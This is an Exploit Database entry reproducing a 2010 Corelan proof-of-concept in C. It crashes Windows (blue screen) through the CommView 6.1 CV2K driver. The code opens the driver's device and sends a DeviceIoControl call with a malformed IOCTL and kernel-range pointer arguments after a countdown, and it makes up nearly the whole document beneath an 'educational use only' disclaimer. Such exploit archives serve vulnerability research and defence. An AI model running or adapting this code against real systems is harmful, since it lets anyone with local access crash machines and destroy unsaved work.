CommView 6.1 (Build 636) – Local Blue Screen of Death (Denial of Service)

• Exploit Database
• 13 阅读

• 作者： p4r4N0ID
  日期： 2010-04-23
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12356/

• /*-------------------------------------------------------------------------*/
  /**
  # Exploit Title : CommView Version 6.1 (Build 636) Local Denial Of Service (BSOD) 
  # Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-030
  # Date: April 23rd, 2010
  # Author: p4r4N0ID (T.B)
  # Bug found by: p4r4N0ID (T.B)
  # Software Link : http://www.tamos.com/download/main/
  # Version : Version 6.1 (Build 636)
  # OS: Windows
  # Tested on : Windows XP sp2 En (VMWARE)
  # Type of vuln: DoS
  # Greetz to : Corelan Security Team
  # http://www.corelan.be:8800/index.php/security/corelan-team-members/
  #
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  # Do not use this code to do anything illegal !
  # Corelan does not want anyone to use this script
  # for malicious and/or illegal purposes.
  # Corelan cannot be held responsible for any illegal use.
  #
  # Note : you are not allowed to edit/modify this code.
  # If you do, Corelan cannot be held responsible for any damages this may cause.
  #
  #
  **/
  /*--------------------------------------------------------------------------*/
  
  #include <windows.h>
  #include <stdio.h>
  
  
  VOID ShowError()
  {
   LPVOID lpMsgBuf;
   FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
   NULL,
   GetLastError(),
   MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
   (LPTSTR) &lpMsgBuf,
   0,
   NULL);
   MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
   exit(1);
  }
  
  
  int __cdecl main( int argc , char * argv[])
  {
  	HANDLE		hDevice;
  	DWORD junk;
  	int i = 10;
  
  	system("cls");	
  	printf ("|------------------------------------------------------------------|");
  	printf ("| __ __|");
  	printf ("| _________________/ /___ _____ / /________ _____ ___|");
  	printf ("|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |");
  	printf ("| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |");
  	printf ("| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|");
  	printf ("||");
  	printf ("| http://www.corelan.be:8800 |");
  	printf ("|security@corelan.be |");
  	printf ("||");
  	printf ("|-------------------------------------------------[ EIP Hunters ]--|");
  	printf ("[+] CommView Local Denial Of Service (BSOD) - by p4r4N0ID(T.B)");
  
  
  	//CHANGE the GUID so it match your device name
  	//find it in:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}
  	
  	hDevice = CreateFileA("\\\\.\\CV2K_{916BB164-6D0D-45C0-B6C2-79B42A522C17}",
  						 0,
  						 FILE_SHARE_READ | FILE_SHARE_WRITE,
  						 NULL,
  						 OPEN_EXISTING,
  						 0,
  						 NULL);
  
  
  	if (hDevice == INVALID_HANDLE_VALUE)
  	{
  		 ShowError();
  		 return EXIT_FAILURE;
  	}
  
  
  	printf("\n\n\t\t[!] Started Countdown");
  
  	for(i;i>=1;i--)
  	{
  		printf("\r -[ %d ]- ",i);
  
  		if(i==1) printf("\n[+] Bye Bye, BOOM!!!");
  		Sleep(1000);
  	} 
  
  	DeviceIoControl(hDevice, 
  					0x00002578, 
  					(LPVOID) 0x80000001,
  					0,
  					(LPVOID) 0x80000002,
  					0,
  					&junk,
  					(LPOVERLAPPED)NULL);
  
  
  	return EXIT_SUCCESS;
  
  
  }